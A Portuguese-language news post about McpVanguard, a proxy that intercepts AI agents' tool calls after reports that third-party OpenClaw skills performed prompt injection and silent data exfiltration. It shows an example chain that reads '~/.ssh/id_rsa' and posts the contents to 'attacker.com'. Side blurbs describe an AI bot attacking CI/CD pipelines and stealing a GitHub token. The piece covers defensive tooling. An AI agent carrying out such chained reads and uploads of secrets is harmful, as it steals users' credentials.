Proxy McpVanguard Bloqueia Exfiltração de Dados da Habilidade OpenClaw

Em resposta à descoberta da equipe de segurança de IA da Cisco de que habilidades de terceiros do OpenClaw realizavam exfiltração silenciosa de dados e injeção de prompt, um desenvolvedor lançou o McpVanguard, um proxy projetado para ficar entre um agente de IA e suas ferramentas para bloquear chamadas maliciosas antes que sejam executadas.
O Problema: Chamadas Maliciosas em Cadeia
A questão de segurança não é um bug no próprio OpenClaw, mas uma consequência dos agentes terem acesso ao sistema de arquivos, execução de shell e chamadas de rede sem limites de aplicação. Os testes da Cisco revelaram um padrão em que chamadas individuais aparentemente inocentes se combinam para criar uma violação, como:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Nenhuma das chamadas parece maliciosa isoladamente, mas juntas elas exfiltram dados sensíveis. De acordo com a fonte, o ClawHub teve mais de 820 habilidades maliciosas em seu pico, e o CVE-2026-25253 permitia que atacantes alcançassem execução remota de código através de um único link malicioso. A validação atual no nível de habilidade falha em detectar essas sequências de chamadas em cadeia.
A Solução: Proxy McpVanguard
O McpVanguard aborda isso interceptando chamadas entre o agente e suas ferramentas. Ele usa três métodos de detecção:
- Correspondência de padrões
- Pontuação de intenção semântica
- Detecção de cadeias comportamentais em toda a sessão
A instalação é via pip: pip install mcp-vanguard.
Camada Mais Profunda: Protocolo VEX
O projeto inclui uma camada de segurança mais profunda chamada Protocolo VEX, descrita como um sistema de "gravador de voo". Ele fornece:
- Trilhas de auditoria Merkle para registro à prova de adulteração
- Verificação de identidade do agente baseada em TPM
- Aplicação no nível de chamada do sistema
O Protocolo VEX é construído em Rust e o desenvolvimento começou em dezembro de 2023, antes que o OpenClaw ganhasse popularidade generalizada. A fonte observa que a NVIDIA recentemente lançou o NemoClaw para fins de segurança semelhantes, indicando que esse tipo de ameaça não vai desaparecer.
Ambos os projetos estão disponíveis no GitHub:
📖 Read the full source: r/openclaw
👀 See Also

Hackerbot-Claw: Bot de IA Explorando Fluxos de Trabalho do GitHub Actions
Um bot alimentado por IA chamado hackerbot-claw executou uma campanha de ataque automatizada de uma semana contra pipelines de CI/CD, alcançando execução remota de código em pelo menos 4 de 6 alvos, incluindo projetos da Microsoft, DataDog e CNCF. O bot usou 5 técnicas de exploração diferentes e exfiltrou um token do GitHub com permissões de escrita.

Desenvolvedor Cria Sandbox Firecracker MicroVM para Segurança OpenClaw
Um desenvolvedor preocupado com a segurança de LLMs construiu um sandbox bare-metal usando microVMs Firecracker para isolar scripts OpenClaw, com cada script rodando em seu próprio kernel Linux com limite de 128MB de RAM e sem rede por padrão.

Auditoria de Segurança Descobre que os Servidores de Referência MCP da Anthropic São Vulneráveis, Introduz Vulnerabilidades Baseadas em Alucinação
Uma auditoria de segurança de 100 pacotes de servidores MCP descobriu que 71% receberam nota F, incluindo as implementações de referência oficiais do Anthropic no GitHub e para sistemas de arquivos. A auditoria identificou Vulnerabilidades Baseadas em Alucinação que criam brechas de segurança e desperdiçam tokens através de loops de raciocínio.

OpenClaw Skill Analyzer: Analisador de Segurança Estática para Habilidades de Agentes de IA
Um desenvolvedor criou um analisador estático que verifica habilidades do OpenClaw em busca de riscos de segurança antes da instalação, com mais de 40 regras de detecção em 12 categorias, incluindo injeção de prompt e exfiltração de dados.